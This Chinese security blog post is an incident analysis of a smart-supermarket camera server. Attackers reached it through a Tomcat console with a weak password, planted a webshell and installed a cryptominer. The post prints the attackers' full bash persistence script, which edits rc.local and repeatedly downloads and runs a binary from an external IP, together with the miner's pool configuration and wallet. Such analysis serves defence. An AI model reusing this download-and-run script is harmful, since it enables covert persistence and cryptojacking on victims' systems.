针对智能超市摄像头的攻击链分析

bt0sea 系统安全 2019年4月3日发布
Favorite收藏

导语:伴随着数字化浪潮在智能超市的应用,越来越多的线下门店都开始使用智能系统。

0x00、前言

伴随着数字化浪潮在智能超市的应用,越来越多的线下门店都开始使用智能系统,包括:人脸识别系统、小程序商城、会员营销系统、以及支付平台。人脸识别,可以帮助商家识别vip用户,识别进入门店人脸表情分析满意度,刷脸支付,然后通过小程序商城线上线下联动,完成整个销售流程。后端管控中台,做精准营销等。但是这一切都离不开后端IT系统的支持。

0x01、入侵排查

本次被入侵的系统为承载人脸识别的摄像头系统,在态势感知产品监控告警中,我们发现tomcat目录下出现了webshell。同时,还有对外连接的挖矿IP地址。

目录为:usr/⁨local⁩/⁨tomcat⁩/⁨webapps⁩/⁨mTQf/m.jsp

具体查看后发现是jsp File Browser。上传、下载文件功能,为以后入侵打下基础。

jsp-File-Browser_1.png

列举进程信息后,我们发现:

root     10177  0.0  0.0 106336  1632 ?        S     2018   0:11 /bin/bash ./systems
root     13156  0.0  0.0 107148  2524 ?        S    Mar18   0:27 /bin/sh /tmp/javax/config.sh

同时,我们在tmp目录当中发现了下载脚本。

下载脚本如下:

脚本大致的意思:是否存在重复下载检测,添加启动项,一直监控lsys文件释放存在,如果没有去http://103.55.13.68:13333/lsys下载程序,然后添加执行权限。运行lsys elf文件。

#!/bin/bash

if [ "sh /etc/chongfu.sh &" = "$(cat /etc/rc.local | grep /etc/chongfu.sh | grep -v grep)" ]; then
    echo ""
else
    echo "sh /etc/chongfu.sh &" >> /etc/rc.local
fi

while [ 1 ]; do
    Centos_sshd_killn=$(ps aux | grep "/tmp/lsys" | grep -v grep | wc -l)
    if [[ $Centos_sshd_killn -eq 0 ]]; then
        if [ ! -f "/tmp/lsys" ]; then
            if [ -f "/usr/bin/wget" ]; then
                cp /usr/bin/wget .
                chmod +x wget
                #./wget -P . http://103.55.13.68:13333/lsys
                ./wget -P /tmp/  http://103.55.13.68:13333/lsys &> /dev/null
                chmod 755 /tmp/lsys
                rm wget -rf
            else
                echo "No wget"
            fi
        fi
        /tmp/lsys &
        #./lsys &
    elif [[ $Centos_sshd_killn -gt 1 ]]; then
        for killed in $(ps aux | grep "lsys" | grep -v grep | awk '{print $2}'); do
            Centos_sshd_killn=$(($Centos_sshd_killn-1))
            if [[ $Centos_sshd_killn -eq 1 ]]; then
                continue
            else
                kill -9 $killed
            fi
        done
    else
        echo ""
    fi

    Centos_ssh_killn=$(ps aux | grep "/tmp/lsys" | grep -v grep | wc -l)
    if [[ $Centos_ssh_killn -eq 0 ]]; then
        if [ ! -f "/tmp/lsys" ]; then
            if [ -f "/usr/bin/wget" ]; then
                cp /usr/bin/wget .
                chmod +x wget
                #./wget -P .  http://103.55.13.68:13333/lsys
                ./wget -P /tmp/  http://103.55.13.68:13333/lsys &> /dev/null
                chmod 755 /tmp/lsys
                rm wget -rf
            else
                echo "No wget"
            fi
        fi
        /tmp/lsys &
        #./lsys &
    elif [[ $Centos_ssh_killn -gt 1 ]]; then
        for killed in $(ps aux | grep "lsys" | grep -v grep | awk '{print $2}'); do
            Centos_ssh_killn=$(($Centos_ssh_killn-1))
            if [[ $Centos_ssh_killn -eq 1 ]]; then
                continue
            else
                kill -9 $killed
            fi
        done
    else
        echo ""
    fi

    sleep 900
done

下载了lsys文件分析后:

1、沙箱分析结果:

屏幕快照 2019-04-01 下午11.32.33.png

访问的恶意域名正好和态势感知系统汇报的域名相同。同时下载挖矿配置脚本。

2、矿池地址:

"pools": [
        {
            "url": "pool.supportxmr.com:3333",
            "user": "46ARamtqSyNEtvXJRATeCWF5KgpzufsXPjgrDn6UA3wahsaU1nysFQoYs9q6xa484o83z4p28Msr9V4z8fXLaXfS1PXfpuo",
            "pass": "x",
            "rig-id": null,
            "nicehash": false,
            "keepalive": false,
            "variant": -1,
            "enabled": true,
            "tls": false,
            "tls-fingerprint": null
        }

3、同时程序伪造成ssdh、sshd2和sshk。

0x02、攻击链总结

屏幕快照 2019-04-01 下午11.24.51.png

和用户确认过,Tomcat服务器web管理系统登陆密码为123456,恶意人员登录web控制台后,上传了JSP File Browser,然后通过JSP File Browser上传了下载sh脚本并且执行。脚本执行后下载了lsys二进制恶意程序挖矿以及僵尸网络外联。

本文为 bt0sea 原创稿件,授权嘶吼独家发布,如若转载,请注明原文地址: https://www.4hou.com/system/17128.html
点赞 1
  • 分享至
取消

感谢您的支持,我会继续努力的!

扫码支持

打开微信扫一扫后点击右上角即可分享哟

发表评论